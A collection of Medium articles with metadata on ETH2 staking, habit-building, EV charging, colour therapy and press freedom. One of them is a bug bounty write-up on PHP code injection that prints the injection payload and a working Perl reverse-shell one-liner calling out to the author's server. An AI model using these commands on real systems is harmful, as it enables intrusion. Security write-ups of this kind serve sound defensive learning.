The key takeaway from Carl’s blog post is that ETH2 is very forgiving in being offline, particularly if you are offline uncorrelated to other validators. So for the scenarios where you are penalized for not fulfilling your validator duties you should worry more about the more likely scenarios and where your validators are offline at the same time as others. These include besides others (in increasing severity):
Infura going down Cloud service providers failure Staking service failure Client failure
How to best mitigate correlated failures like these above?
Resilience. Practically that means: Consider running your own ETH1 endpoint and most preferably a non-geth one — as it is with 80% the majority client. Secondly, if you can’t or don’t want run your staking machine at home use a smaller and/or local hosting provider. Furthermore, be aware that staking services will run a lot of validators, so a failure of a large staking service can automatically lead to correlated failures. So if you can I encourage you to operate your own ETH2 validators. And lastly, similar to your ETH1 endpoint consider running a non-majority implementation for your beacon node and validator client as a bug in the client can affect many validators at the same time. So for the time being this most likely would mean running a non-Prysm implementation.
But what about the most likely failures like internet or power outages?
As we have seen ETH2 is very forgiving when it comes to being offline. So whether it is worthwhile to mitigate failures like internet or power outages depends on two factors:
On your local situation
The number of validators
How often and how long are the outages you have experienced in the past? Do you foresee more outages in the future? The number of validators is important to consider because your failure cost increases (at least) linearly with the number of validators you are running. Let’s do the math:
An easy way to calculate whether a mitigation solution is suitable for you is to consider the downtime over the past year. Let’s call it t_down. Now calculate the rewards for all validators rewardsAvg(2*t_down) that you should expect in avg over the next year for the time 2*t_down (take 9% apr for a rough calculation). Not only are you not getting rewards when being offline you are penalized by the same about. Therefore rewardsAvg(2*t_down) is your opportunity cost. All you need to do now is compare the opportunity cost for the specific failure case with the cost for the mitigation solution.
In case of power outage a simple mitigation solution is using a UPS. UPS stands for uninterruptible power supply and is basically a battery that is put in between the power grid and your staking machine. It acts like a buffer. If there is a power outage your staking machine will get power from the UPS and if the power doesn’t return in time it shuts down your staking machine gracefully. Besides reducing the downtime, it also redcues the risk that the validator db gets corrupted during an outage. UPS’ with high battery capacity cost about $100 and consume some additional power of around 10W. So the cost for a UPS is ~$100 + ~87kWh/year.
In case of internet connection failure a simple mitigation solution is using a dual WAN router with 4G/5G modem. You can set your regular (fiber) internet connection as the default internet connection and the device automatically switches over the cellular connection once the default one drops out. You can get your hands on such a device for about $70 and it consumes about 10W additionally. For the celluar connection you also need a data plan. Costs for the data plan depend on where you are located and the amount of data you expect to need. So the cost for a backup internet connection is ~$100 +~87kWh/year + cost for data plan.
If your opportunity cost for being offline exceeds the cost for your mitigation solution, the mitigation solution might be worthwhile for you and you should ask yourself whether it is also worth your time setting it up.
For example if your internet connection has an uptime of 99%, so about 1% down times, then the opportunity cost, given an average apr of 9% and the price of Ether $553, would be $31.85 per validator. For such an internet connection it wouldn’t make sense to have a backup connection for a single validator. But if you are running 20 validators suddenly your total opportunity cost would be $637. Then the backup internet setup becomes certainly worthwhile to consider.
Are these the worst case scenarios?
No. So far we have mostly talked about scenarios where you are penalized for not fulfilling your validator duties e.g. because your validators are offline. Now there are scenarios where your staked funds are at risk. I consider these failure cases as even worse (in increasing severity):
Getting slashed Losing access to mnemonic 3rd party getting access to mnemonic
Now, the most likely way you will get slashed is by trying to build advanced validator (failover) setups that should provide redundancy or by building custom slashing protection systems. At first this sounds counter-intuitive, but you are more likely to shoot yourself in the foot with custom failover systems or custom slashing protections as we have seen in the recent slashings on ETH2:
Staking service provider Stkr by Ankr got 10 validators slashed by running a faulty slashing protection
So don’t try to be smart (: and rather be offline for a few days than having a faulty custom solution that slashes you rather than protecting you. As we have seen ETH2 is very forgiving in being offline.
Also: Don’t run your validator keys in multiple places!
Running your validators in multiple places is a bad idea as experienced by the first validator that got slashed on ETH2
The mnemonic as known as seed phrase is the very secret that you get when generating your keys. The mnemonic is the only way to withdraw your funds later. It is also the only way to re-generate your validator signing keys if you lose them. So you really need to make sure that your mnemonic is stored at a safe place. A place that is secured against third party access (that includes especially do not store the mnemonic on a internet connected device) and environmental impact like fire, flood etc.
Also, check out my article ‘The top ten mistakes you can make’ when ETH2 staking.
As always feel free to reach out to me on Twitter @phil_eth or on the Ethstaker discord @phil.eth. Ethstaker is the warm and welcoming home for all Ethereum stakers and future stakers. If you haven’t joined so far come by and say hello ❤
|
https://medium.com/ethereum-staking/there-has-been-a-lot-of-talk-lately-about-making-your-eth2-staking-setups-failure-proof-b2979b921fb0
|
[]
|
2020-12-11 00:46:35.927000+00:00
|
['Blockchain', 'Failure', 'Solutions', 'Staking', 'Ethereum']
|
Um so I had an amazing year
|
You cannot get poor enough to help poor people thrive or sick enough to help sick people get well. You only ever uplift from your position of strength and clarity and alignment. — Abraham/Esther Hicks
So.
I had an amazing year.
And I’m embarrassed to say it because I’m not dumb. (At least I hope I’m not.) I look around and can see suffering. Upheaval. Sickness. Poverty. I’m not denying those things exist or minimizing anyone else’s experience.
But I wanted to share why I had an amazing year with the intent of uplifting someone else.
Maybe you.
I’m ending the year feeling happier, healthier, richer, more creatively fulfilled, and closer to my family than I have in a very, very long time. I credit this to a few small but key things — and overall, to one book.
Last year about this time I listened to Atomic Habits by James Clear. I’ve lost track of how many copies I’ve bought of this book. Maybe four? At least two hardback copies, because I gave one away. Simply stated, the audio changed my life.
Just — if you’re sick of listening to yourself complain about your bank account or weight or whatever, and you’re serious about changing things, go read/listen to this book.
AND THEN ACTUALLY DO WHAT HE SAYS. The little, dumb, tiny changes. Because they add up.
Last year I got sick of complaining about the same things year after year. And since I mostly complain in my journal or in my own head, it was a very boring place to be. I got sick of wondering why the balance in my bank account didn’t change, why I wasn’t losing weight, and why I wanted to write so much and wasn’t getting anywhere, even though I tried.
But these things (richer, slimmer, more creative) were also what I really desired, deep down inside. I wanted to feel more financially stable, healthier (defined by weight loss), and to write more. (Well, I already wrote plenty. I wanted to write stuff and put it in public where people could actually read it.) These dreams felt very special and secret, but I think they’re somewhat universal — at least for authors.
(Please note: I know that mental health can get in the way of taking any action at all. I’ve written about my depression and anxiety before. If this blog entry makes you feel overwhelmed, please know I’ve been where you are. Focus on taking care of yourself in whatever way you can and don’t worry about all this aspirational ambitious stuff I’m writing. Because the aspirational and ambitious can simply be getting out of bed and taking a shower. I’m proud of you for hanging in there.)
After listening to Atomic Habits, I decided to do the following macro habits all throughout 2020 — and I checked these off on a little grid in the James Clear journal:
1. Take my vitamins.
2. Save $5 every day.
3. Write 10,000 words per week.
4. Post a blog entry every Wednesday and Saturday.
5. Go to the gym 3–5 times a week.
I thought that these were things that could get me to my goals — richer, slimmer, more creatively fulfilled. And overall — happy.
I also had some habits I already did. These were:
1. Meditate for 10 minutes every day. (I usually use a guided YouTube video).
2. Write three pages longhand as Morning Pages (per Julia Cameron). (Incidentally, I’ve done this for decades and credit it to the reason I don’t get writer’s block.)
3. Take a Swedish lesson on Duolingo.
I just wanted to keep these up.
I have lots more habits … like brushing my teeth or whatever (and I actually floss because I bought the stuff and leave it out where I can see it), but the ones above are my more unusual habits.
Well, what happened?
1. I took my vitamins. Boring, but I’m also quite healthy, so maybe it helps my overall wellbeing. I haven’t been sick all year. I keep them by my bed where I see them and remember to take them.
(Yes, I wash my hands all the time and don’t touch my face. And yes, I stayed home in quarantine. Yes, I wore a mask when I went out. But I think taking vitamins helped.)
2. I ended up saving $5 every workday not every day. I either transferred the money to a Capital 360 account because it’s hard to transfer it back or put $5 into a Stash account. I sometimes would skip Starbucks or something similar and feel virtuous about transferring the $5. Other times I just transferred it.
At the beginning of the year, the Capital 360 account had $5. It now has $806.
At the beginning of the year the Stash account had $50. It now has almost $2500. (Buying $5 here and there in March when the stock market was down ended up making about $500 over the year, a 23% increase.)
Um, so that’s like $3200 I just kinda now have. Incidentally, $5 per day is $1825 over the course of the year, and I’ve almost doubled that because I invested it, not just saved it — and also sometimes I’d transfer like $10 or $25 if I was feeling wild. Over the months, I saw how the account balance would get close to an even number (like $500), so I’d transfer enough to make it that amount. And it just kept going.
(Also, I’m not intending on this to be money advice. Go talk to someone who actually knows. My thought process was to hedge my bets with doing both safe and speculative — a savings account that earned interest and then various stocks. I also wasn’t spending money I needed for food, shelter, etc. I barely felt the expense, but I very much feel the accumulation of savings.)
There really is magic in just starting to do something small, because it really does compound and snowball into good things.
Maybe in the grand scheme of things $3200 isn’t that much. To me it feels like I have this cute little cushion I literally created out of loose change in a year.
Honestly, it feels like a lot, not “cute” or “little.” If I don’t compare myself to millionaires, it’s kind of amazing.
What would happen if you transferred $1 or $2 a day? By the end of 2021, see how much you have…
Another money habit: I wanted to stop buying so much online and one-clicking so many ebooks — even free ones — because it was just too much. I had like 800 unread books. So I kept track of the days I didn’t buy anything or download any books. My ecommerce moratorium ended up being streaks of time I didn’t buy anything and then a day where I would buy everything off of Amazon or whatever all at once. Not sure it did much except make me feel marginally better. With ebooks, while my TBR count is less than what it was at the beginning of the year, it isn’t the zero I’d hoped it to be. But I seriously read about 300–400 books — about 1–2 a day. (I read fast and don’t sleep.) My “read” pile jumped from 800 to 1100. Not sure what to make of it except I read so much and it was really fun. So, I still have about 680 books on my TBR pile for next year. That can be another habit to work on.
3. I’ve written more than 530,000 words this year. The habit I tied it to incidentally, was opening my laptop. If I open my laptop — and that’s a habit I record with a tick mark on a grid — it’s a lot easier to get into the document and start writing. So the way I trick myself to write is I tell myself all I have to do is open my laptop. Simple. I check off the box that I did it and I feel virtuous. To reward myself for actually getting the word count, I have a little jar with binder clips in it and every 1,000 words I put a binder clip in a small old milk bottle. Then I can see the words add up.
I also did a spreadsheet to know what I’ve written this year. I’ve never done one before because it felt too quantitative rather than qualitative. Writing is supposed to be this outlet for me, not something to beat to death with statistics. But I’m glad I did it because writing can be so amorphous. Putting parameters on it made it feel real.
Oh, and I’ve finished one book, set to be published in February. I have a contract for another, and it’s (today) at 77,000 words. Three more books are 50% or more done. And I did NaNoWriMo. So, yeah. It was a productive year.
I also learned that I like juggling projects. Focusing on one can make me stagnant. If I get stuck on one, moving to another really seemed to keep my momentum going.
But I’m now focusing on getting them done and shipped. One at a time. Because they’re all just so close I can feel it.
4. Before this year, I’d published eleven blog entries from 2017 to 2019. This year, I’ve posted 97, not counting this one. I missed a time or two at the beginning, but um, yeah… That’s a big difference.
The reasons I wanted to focus on posting blog entries were multifold. I’d felt “out of it” as far as publishing, having worked on one book for so long that wasn’t gelling. I’d felt frustrated and jealous of those who got their work done. I needed the instant gratification — so to speak — of putting something out there while I worked on projects that took longer. I also wanted to inure myself to the fear of putting myself out there. With each entry — still — I feel fear, but I wanted to do it anyway. So that when the time comes to publish more fiction, I can go, “yeah, I’ve hit publish (literally) 100 times, what’s the big deal?”
My guiding point for writing a blog post has been my gut feeling — tempered by wanting to reach out and help someone else. But to keep up a streak, there is a document on my computer called “Default blog post.” This is what it says in its entirety:
Default blog post
I told myself I just needed to post a blog every Wednesday and Saturday.
Here is me keeping that promise.
If you see that, well, you’ll know how the week is going.
Is there an endgame here? What am I going to do with these blog posts? I can see me taking some ideas and expanding on them and creating some sort of nonfiction/self-help kind of book. I’ve always wanted to do that. I do see them as steppingstones to something bigger.
It also lets me be okay with imperfection. Typos. “Think-Os.” Whatever. This is me with no editor.
5. So, the gym. Well, until it closed, I was going. My trigger was that I just had to check in. That was how I checked the box. Like opening the laptop, actually getting to the gym is the hard part. Once I was there, it was easy.
But the gym closed and is still closed. Like all of us, I needed a Plan B. (C? D?)
I’ve done short walks and long. Currently, I’m just working on doing pushups. I can do a lot of pushups with my knees on the ground. But I can only do a few “real” ones, so that’s what I’m keeping track of. I’m focusing on doing them slowly and properly, not faking my way through them. Faking them is easy, but I’d rather be able to do them right and have the actual arm strength. My trigger for when I do them is when I close my journal, I have to get down and do pushups. (Currently it’s seven.) To someone else that goal might be ridiculously easy. To me, it’s rather difficult and a little embarrassing to post, but whatever. I’m being honest.
I’m ending the year a few pounds lighter than last year — and lighter than I’ve been in years — so I’m calling it a win.
With the other habits, meditating keeps me happy as does dumping my brain in the morning pages. Oh, and I’m on day 622 in a row of Swedish on Duolingo. It feels like I’ve taken about a semester of college Swedish. Not enough to actually converse with someone but getting the hang of it. I’m motivated by a desire to go to Sweden and see some ancestral places — and actually understand some of the language, even though I know most Swedes speak better English than me.
With COVID-19, like most of us, I’ve spent more time at home, but I’m temperamentally suited to that. I know it’s hurt extroverts hard, but as far as I’m concerned, I got to see my family more — even when I went to the office for work.
What am I looking forward to next year? I like the habits I started for 2020. I just want to keep these systems up, because they seem to be working for me. I hope that by using these systems I end up with four to five books happily published in 2021 and I look forward to seeing how the exercise and money habits work out as well.
This entry is about two or three times my usual blog entry, so if you made it this far, thank you. I hope it inspires you to take a small action and then keep taking that small action over and over again. They really do add up.
I wish you the most amazing year ever in 2021. Know that it’s possible.
|
https://medium.com/@lesliemcadamauthor/um-so-i-had-an-amazing-year-c637d79ca83f
|
['Leslie Mcadam']
|
2020-12-26 19:24:32.414000+00:00
|
['Atomic Habit', 'Money Management', 'Weight Loss', 'New Year Resolution', 'Self Improvement']
|
EV Charging Availability: Myths Busted
|
Where or how to charge up your EV is no longer a problem.
Are you one of 40 million Americans thinking about switching to an electric vehicle (EV) for their next car? Maybe you still have some questions or doubts.
For instance, EV naysayers are quick to claim that charging is a huge problem. They tell you to figure in hours of wait time every time you need a charge — if you can find a port with the plug that fits your particular car and if no one’s in front of you already waiting.
The good news is that recent improvements in EV charging station availability and technology make it super easy to charge and go — almost as fast as you can say EV.
Here you’ll learn that five common myths about EV charging anxiety are just plain false today. And you’ll find loads of tips to make finding EV charging station availability effortless.
EV Charging at Home
First off, all five of the myths dispelled below can be rendered null and void by considering two simple facts:
1. According to the Office of Energy Efficiency and Renewable Energy at the United States Department of Energy, 80% of all electric car owners charge at home.
2. The U.S. Census Bureau’s latest survey reports that the average home-to-work commute time is 26.6 minutes which, depending on driving speed, could mean 20–40 miles behind the wheel each way for most Americans.
Because EVs today can travel about 250–300 miles on a single charge (varies depending on car make and model, driving conditions, speed at which you travel, battery age, etc.), most EV owners never worry about having to find a public EV charging station nearby.
Granted, range anxiety and charge availability may have been an issue when EVs were first invented in 1832. Or even just 10 years ago when EVs regained their popularity due to growing concerns about reducing car emissions in the face of climate change and went about 85 miles on a single charge.
But it’s not true any more.
All you have to do is make sure you “fill up” at home when you need to. If you’re commuting short distances or running errands close by, you could easily go for days or even weeks between charges at home.
It’s actually not that different from checking the gas gauge on a gas-powered car. You’re probably already used to doing that. Only difference is: With an EV, you don’t have to hold your breath over the noxious fumes at the filling station.
With an EV, you can leave home every day on a “full tank” — if you so desire — for peace of mind. No stops at the gas station. Just recharge while you’re sleeping.
Today, many states or local jurisdictions are rewriting their building codes to guarantee that new homes, apartment complexes, and commercial centers come equipped with the charging outlets for EVs.
For urban dwellers with on-street parking, charging at retail locations or restaurants while you shop or dine is your best option. In fact, experts predict that much more charging station infrastructure will become available in the near future around shopping and dining hubs.
So it’s no surprise that Tesla recently announced their focus on apartment complexes.
But, what if, despite your best intentions, you’re out and about in need of a charge? No need to panic. Here are the EV charging station availability myths…busted.
Myth #1: There are no or very few places to charge my EV
In the past few years, EV charging station companies have been popping up all over. You can find the latest figures state by state on the website of the U.S. Department of Energy Alternative Fuels Data Center.
According to that source, as of November 30, 2020, there were 28,486 EV charging stations with a total of 94,455 charging ports available all across the nation.
Here’s a breakout from that database of the three station types currently available in the USA (followed by their respective charging rates in parentheses):
Level 1: 1,437 (3–5 miles/hr.)
Level 2: 76,146 (12–75 miles/hr.)
DC Fast Charging (DCFC): 16,824 (100–300 miles/hr.)
Levels 1 and 2 provide electricity in the form of alternating current (AC) that your vehicle converts to the direct current (DC) it needs to operate. DC fast charging supplies extremely high-voltage direct current to your battery. Not all electric vehicles on the market today accept DCFC.
If you’re planning a long trip where you will need to recharge along the way, there are currently several EV charging station companies with nationwide locations. Here are a few of the major ones:
● ChargePoint
● EVgo
● EV Connect
● Blink Charging
● Electrify America
Right now, Tesla restricts access to its vast network of charging stations to Tesla car owners only. (Although this may be changing — at least in some countries.)
Individuals driving all other EV car makes and models should consult with at least a couple of companies for charging availability, costs, and fees along your proposed route. Then, maybe from a quick spreadsheet you put together, compare and save.
Myth #2: Charging stations are too far apart
Between the growing number of electric car charging station companies and their ever-expanding networks all over the country, it’s almost a sure bet that you’d be able to find a charge if you needed one.
It may take some planning your route in advance. You’d be smart to purchase a charging subscription or two before you hit the road — or at least register with a couple companies. Some accept credit cards but others may require their own card. Check before you go!
Better safe than sorry.
But, these are really just logistical details that you can deal with. When worked out early, your trip should go smoothly.
But…what if it doesn’t?
Say you’re on a cross-country road trip in your new electric car, lost in the middle of nowhere. You have a charged smartphone but you’re out of range. And you have only 100 miles of charge remaining in your car’s battery. What do you do?
No doubt this is any driver’s nightmare — even if you had a gas-powered car.
Hopefully, before you packed, you’d make sure you had the Level 1 charger that came with your EV when you bought it. You can use it to recharge in an emergency using any standard 120-volt electrical outlet — like at a motel or a small town corner store that you recall passing 50 miles ago before you got lost.
Of course, recharging completely on Level 1 will take a long time, so definitely try to avoid this situation!
Alternatively, you’d have to wait for someone to drive by and hope they’d stop to assist — or at least direct you to somewhere nearby with cell phone reception.
Then when you get internet access, try these suggestions (in no particular order):
● Get on the apps from the companies listed above to find out if there’s an EV charging station close enough to get to. (Hopefully, you installed the apps and registered before you left home.)
● Call customer service at those charging station providers to see if there’s a port suitable for you close to where you’re located, and if it’s currently unoccupied. (You may be able to find all this out from the app without placing a call.)
● Put out a call to help on social media — EV drivers are among the most helpful people on the road!
● Contact local automotive stores or EV car dealerships to see if they sell the Level 1 charger you can use from any electrical outlet.
Unfortunately if you’re stuck, purchasing a Level 2 charger — like the one you use at home — while you’re on the road won’t help. You need an electrician to install it, and they won’t do it without the permission of the owner of the building where you want to use the electrical outlet (like a motel or convenience store).
Tip: Some auto clubs and car insurance companies offer an EV recharge service in their plans. It works much like their flat tire roadside assistance. If you intend to make many long-distance trips with your electric vehicle, it’s worth it.
Myth #3: I never know if a charging station will have the plug I need
Anti-EV folks may try to convince you that unless all electric cars come with a universal plug that’s compatible with all charging ports, it’s a problem. And a good enough reason never to buy an EV.
Fortunately, Level 1 and Level 2 plugs for EVs sold in America use the same “electric vehicle conductive charge coupler” named J-1772. (The one and only exception is Tesla, but they sell an adapter for use with the J-1772.)
For DC fast charging, there are two main types of chargers: the CHAdeMO and the CSS (Combined Charging Standard). The CHAdeMo is used on Asian EVs, while U.S.-made and German cars use the CSS. Tesla has its own unique DC fast charger plug.
There are a few basic points to keep in mind about plugs and adapters when you’re on the road:
1. Charging stations may have many more CHAdeMO ports compared to CSS ports, so if your car takes CSS, plan ahead for sure.
2. Tesla charging stations are for Tesla cars only.
When in doubt, call or text the charging station company ahead of time to confirm that a port you can use is at a specific location on your route.
Tip: Before hooking up to any charging port, make sure:
● The cable isn’t frayed. (You don’t want to get shocked by accident!)
● There aren’t any cobwebs, cocoons or insects (dead or alive!) inside the plug.
● The inner gaskets and connection points are intact and in good shape.
If you spot any irregularities, be a courteous EV driver and call it in for a repair. The next person to use the station will thank you.
Myth #4: I can’t be sure if the charging station I need will be occupied
There are many apps that will let you know what’s available for charging your EV at any given moment. Do your research before you head out and choose the best one for you.
One of the most popular is Plugshare. From its app, you’ll get real-time information on charging stations owned by different companies. When you become a member, you’ll get alerts when chargers compatible to your vehicle become open. Plus a whole lot more!
Besides charging station apps providing the latest information on availability, Google Maps offers this real-time service as well.
If you’re traveling long distance, be sure to:
1. Install several charging station company apps on your phone — or at least something like Plugshare.
2. Check for port availability ahead of time.
3. If possible, make a reservation for the port you need.
4. Show up on time and hook up.
5. If you step away to shop or dine out, be sure to return at the estimated time to remove your vehicle once it’s fully charged. (Check the company’s app to see progress to completion.) Note: Some companies give you a short grace period before they start adding late fees to your bill.
6. Cancel your reservation as far in advance as possible if you need to. You never know — someone else may need that particular port.
Tip: There are many blogs and social media accounts expressly devoted to providing EV owners with charging station information, including charging at private homes. Don’t hesitate to get in the loop! You never know when you might need it.
Myth #5: EV Charging takes too long
The best way to charge your electric vehicle is with a slower charge overnight. By contrast, fast charging too often can damage your battery.
But if you’re in a rush, fast charging may be your only option.
Fortunately, fast EV charging is widely available now and expanding rapidly all over America. But, remember to make sure your EV can handle it before connecting, because not all can.
Currently, for some EVs, you can get a 80% charge in 30 minutes.
And price? Compared to the cost of a full tank of gas, you will most likely pay significantly less — up to $15,000, in fact — over the entire time you own your EV (15 years on average).
Wrap Up on EV Charging Station Anxiety Myths
Driving an electric vehicle without worrying about charging station availability is becoming easier all the time.
Although the huge majority of EV drivers fill up at home overnight with plenty of juice for up to 250+ miles, (depending on the vehicle), you could still find yourself — however unlikely — far from home in need of a charge.
At those times, it’s good to know that there are a growing number of charging station companies with locations all over the USA. A fast charge is literally just an app away on your phone.
With a wide network of EV charging station availability and a little planning, you’ll never look back after making the switch from a gas-powered to an electric car.
If you like this story, follow me and check out my free ‘How Energy Efficient Are You?’ quiz at EricTheEnergyBuff.com.
#ElectricCar #EV #ElectricVehicle
|
https://medium.com/@ericmelchor/ev-charging-availability-myths-busted-5141fae4183c
|
['Eric Melchor']
|
2020-12-16 10:56:41.726000+00:00
|
['Ev', 'Electric Car Charging', 'Electric Vehicles', 'Ev Charging', 'Electric Car']
|
Connect with Colour — Using Art as a Way of Knowing
|
Connect with Colour — Using Art as a Way of Knowing
The Therapeutic Value of Colour
Colour is so tightly woven into our world we rarely stop to wonder what it is and how it works? Since the beginning of time, we have understood that sunlight is essential to life on our planet. Colour, is light and it is measured in wavelengths. The colours we choose to surround ourselves with in our daily lives are of great importance because we are in constant dialogue and response to our environment. Colour is a big part of this conversation because colour effects our entire organism with the energy and frequency produced by light. Once colour is seen it is then also felt through our bodily response.
It might be our eyes that “see” colour, but essentially it is our brains that process the information and send the information back: the banana is yellow, for example. The central nervous system is the main control centre of our actions and each stimulus received first affects the brain stem and then the nervous system. Colour is just one of these stimuli and after it is seen, it is also felt. The eye performs two functions: light sensitive cells known as cones in the retina at the back of the eye sends electrochemical signals to the area of the brain known as the visual cortex where visual images we see are formed. Simultaneously some retinal ganglion cells respond to light by sending signals to the hypothalamus, which interestingly enough plays no part in forming visual images. This is the non-visual aspect of ‘seeing’ that brings about the somatic response. The hypothalamus is a key player in the secretion of a number of hormones which control the body’s self-regulation. This shows there is a clear physiological connection through which colour and light can affect us. The discovery of the non-visual pathway to the hypothalamus suggests that the colour around us affects us both physiologically and psychologically.
Our bodies biological reaction to colour are very much the same; however, how our mind and spirits (psychic) response to colour is different from person to person. The biological response only last as long as we are exposed to the colour/s. This is where our mind and spirit come in: if we were to have an experience with colour that is impactful, if our senses have been stimulated, if we have been moved by our experience with colour then once that colour has disappeared from our view, we can continue to benefit from the experience through memory and sensation. Colour has an effect on our mind, body and soul through our senses.
I have created a workshop that uses our relationship with colour for nourishment. In my workshop Connect with Colour, I take the participant on a journey to meet their “Intentional Colour”. We begin by setting an intention for the workshop, this gives the workshop a purpose and our inner knowing a directive. This journey to meet the colour/s that speak to the intention set, is a journey into the imagination through mediation and visualization.
The meaning of intentionality relates to our capacity to be self-conscious. Self-consciousness is a heightened state of self-awareness. It is also something that happens in our physical or mental minds. When creating an experience with colour, a level of intentionality already exists in the act of creating a space. So, if we are going to do something with intention, we are doing it purposefully. It is a conscious act, we become self-aware about what they want to achieve so that they can bring it into being. I ask the participant what they would like to focus on or where would they like to see shift or change for themselves, what would be a good outcome to the issue at hand? This becomes their intention for the workshop. It is important to be specific so you can focus on what you need in the moment and also what is necessary for you right now. Setting an intention activates a part of our receptivity.
In my Connect with Colour workshop, I use exposure to colour through visualization and stimulation of the imagination first, then follow with traditional visual exposure to colour during art making. We allow the colours our intuition has presented us with to begin to nourish us. I feel confident we already hold the answers that we need and that colour has the ability to facilitate what wants to be heard through its vibration and frequency, subliminal communication if you will. Colour with all of its persuasive qualities, and effect on a cellular and psychic (mind and soul) level is truly a fascinating tool.
We have experienced the world visually, in colour, before language was developed. We have lived in a world of colour and vibration since the beginning of time. The vibration of colour and all that is around us is primary. Drawing helps us verbalize our visualization; we use art as a way of knowing. Art making allows us to access our subconscious giving us time to find the words after we have expressed ourselves. Artmaking gives us time to process and work through what is ‘on our minds’.
Connect with Colour is about us making time to co-create a space for a greater connection with ourselves. We co-create with colour, with art and with our inner knowing. I believe creativity is a muscle and the more we flex it and use it the stronger it will become. Why do we need creativity? Creativity is what helps us find creative solutions to what might be standing in our way. Using art as a way of knowing we can become artisans of our inner knowing. We have a wealth of resources that lie within: we only need to make space to hear them.
On my website you will find a promotion video and the self-guided workshop Connect with Colour. Please check it and may we all become artisans of our inner knowing! With Kindness Destiny Sophia @artofinnerknowing. www.destinysophia.com
|
https://medium.com/@dee-98039/connect-with-colour-using-art-as-a-way-of-knowing-e05b18e966ac
|
['Destiny Gagiano']
|
2020-12-15 13:23:37.821000+00:00
|
['Colour', 'Therapy', 'Art As A Way Of Knowing', 'Expression', 'Creativity']
|
Bugbounty PHP Code Injection Trick to Bypass Remote Code
|
Injected Code Success ^_^
Remote Code Execution
The expected backend code:
<?php
$input = $_REQUEST['local'];
eval('$input');
?>
If parameter value reflects inside double quotes will execute but inside single quotes cannot execute so we used single quote to close the statement and dot sign to concatenate
'.system("command").'
================================ <?php
$input = $_REQUEST['local'];
eval(''.$input.'');
?>
Getting Reverse Shell
I am listening on 1234 port on vps and trying to get reverse shell ..
Trying by bash script and many other ways but failed [X] :(
Trying to check netcat or socat in server ? but not installed [X]
'.system("nc -v").'
not reflected any data mean not performing the command
Trying checks many languages like python , ruby and many of tools which can get reverse shell , not found but when check Perl language
found Perl v5.20
funny meme ^_^
we can get reverse shell by this code
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
request syntax error because [&] sign
Failed operation because sign [&] means end the parameter and start new parameter like username=admin&password=pass
I am trying to encode this sign but not work ..
I am trying to check curl tool installed or no ? by this query
'.system("curl -v").'
It was found. good, lets bypass this operation
I am uploading Perl code on pastebin website after remove perl -e and [‘] quote ..
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
Using curl to access this code and execute by pipe signal
Reverse Shell via Perl
BOOM !! , it’s worked and get a reverse shell
Prevent PHP code injection
- Replace or Ban arguments with & ; && |
- Avoid using exec(), shell_exec(), system() or passthru()
- Avoid using strip_tags() for sanitisation
- Use a PHP security linter
- Utilise a SAST tool to identify code injection issues
- Do not trust any data from user
Stay in touch
Linkedin | Github | Twitter |Facebook
|
https://medium.com/@4bdoz/rce-by-code-injection-perl-reverse-shell-a2e90181b10
|
[]
|
2021-09-06 08:02:01.700000+00:00
|
['Remote Code Execution', 'Hacking', 'Tips And Tricks', 'Tricks', 'Bug Bounty']
|
(UPDATE) Press freedom is declining worldwide
|
By Kent R. Kroeger (October 9, 2018)
This essay was originally published on October 5th. Since then, a Saudi journalist has disappeared in Turkey and a Bulgarian TV journalist has been killed.
According to sources speaking to The Washington Post, the Turkish government believes Saudi Arabian journalist Jamal Khashoggi was “killed in the Saudi Consulate in Istanbul last week by a Saudi team sent specifically for the murder.” The Post’s sources offered no evidence to support their account of events.
Khashoggi, missing since October 2nd, has been an open critic of the current Saudi regime, led by King Salman bin Abdulaziz Al Saud and his son, Crown Prince Mohammed bin Salman.
“The humble man I knew, who disappeared from the consulate in Istanbul, saw it as his duty to stand up for ordinary Saudis,” says fellow journalist and friend of Khashoggi, David Hearst.
“Again a courageous journalist falls in the fight for truth and against corruption,” Frans Timmermans, vice president of the European Commission, said Monday in Brussels.
In the other incident, 30-year-old TV journalist Viktoria Marinova was found dead on October 6th in a park in Ruse, Bulgaria.
Marinova was a director of TVN, a TV station in Ruse, Bulgaria and a TV presenter for two investigative news programs, one of which, Detector, recently featured two investigative journalists reporting on suspected fraud involving European Union funds.
Her final TV appearance was on Sept. 30.
Though Bulgarian authorities do not know yet if there is a connection between Marinova’s death and her work as a journalist, many European journalists are concerned as she is the third journalist to be killed in Europe in the past year. The other two murdered journalists were Jan Kuciak in Slovakia and Daphne Caruana Galizia in Malta.
These deaths add to a growing concern among European journalists that their profession is being targeted by power elites and criminal elements threatened by investigative journalism.
Original essay (published October 5, 2018):
In late August, an anti-immigration rally jn Chemnitz, Germany provided vivid evidence of the far right’s growing popularity, the crowd’s anger directed mainly at Chancellor Angela Merkel and her 2015 decision to allow into the country more than 1 million refugees fleeing civil war and violence in the Middle East.
In Germany, the anti-immigration sentiment has been accompanied by a rise in violence attacks on journalists, according to Reporters Without Borders (RSF), who reports “after reaching a peak of 39 attacks against journalists in 2015, this figure dropped to below 20 in 2016 and 2017.” However, in 2018, such violent attacks are already higher than in 2016 or 2017.
RSF also reports this trend is growing worldwide.
According to RSF, 70 journalists, including citizen journalists and media assistants, have been killed so far in 2018, and is on pace to exceed 90 deaths by year’s end. In addition, 316 journalists are currently imprisoned, including two Reuters journalists who were recently sentenced by a Myanmar judge to seven years in prison for breaching a law on state secrets.
In comparison, 74 journalists died worldwide in 2017, and 80 died in 2016.
But RSF does more than monitor violence against journalists. Since 2002, the Paris-based group has computed the World Press Freedom Index (WPFI) for over 180 countries. RSF describes the WPFI as follows:
